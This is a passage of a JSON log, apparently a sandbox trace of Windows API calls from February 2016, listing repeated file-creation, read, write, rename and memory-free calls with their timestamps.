"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,920", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:00,920", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,920", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,920", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,920", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,920", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,930", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,930", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,930", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,930", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,930", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,930", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,930", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,930", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,930", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,940", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,940", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,940", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,940", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,940", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,940", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,940", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,950", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,950", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,960", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,960", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,960", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,960", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,960", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,960", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,960", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,960", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,960", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,970", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,970", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,980", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtSetInformationFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:00,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,980", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,990", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,990", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,000", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,000", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,000", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,000", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,000", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:01,000", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,000", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,000", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,000", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,010", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,010", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,010", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,010", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,010", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,010", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,010", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,010", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,010", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,020", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": 
"FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,020", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,030", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,030", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,030", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,030", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,030", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,030", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,030", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,030", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,040", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,040", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,050", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,050", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,050", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,060", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,060", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:42:01,060", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,060", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,060", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,060", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,060", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,060", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,060", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,060", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,070", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,080", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,080", 
"api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,080", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,080", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,080", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,080", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,080", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,090", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,090", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,090", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,090", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,090", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,090", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,090", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,090", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,090", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,090", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,090", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,100", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,100", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,100", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,100", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,100", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,100", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,100", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,100", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,110", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,120", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,120", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,120", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,120", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,120", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:01,120", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,120", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,120", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,130", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,130", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,130", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,130", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,130", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,130", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,140", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,140", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,140", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,140", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,140", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,140", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,140", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,140", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,150", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,150", "api": "NtSetInformationFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:01,150", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,150", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,150", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,150", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,150", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,150", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,190", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,190", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,190", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,190", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,190", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,190", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,190", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,200", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,210", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,210", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,210", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,210", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:01,210", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,210", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,210", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,210", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,220", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,230", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,230", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,240", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,240", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,240", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,240", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,240", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,250", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,250", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,250", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,250", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,260", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,270", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,270", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,270", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,270", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,270", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,270", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,270", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,280", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,280", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,280", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,280", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,280", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,280", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,290", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,290", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,290", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:01,290", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,290", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,300", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,300", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,300", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,300", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,300", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,310", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,320", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,320", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,320", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,320", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,320", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,320", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,340", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,340", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,340", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,340", "api": 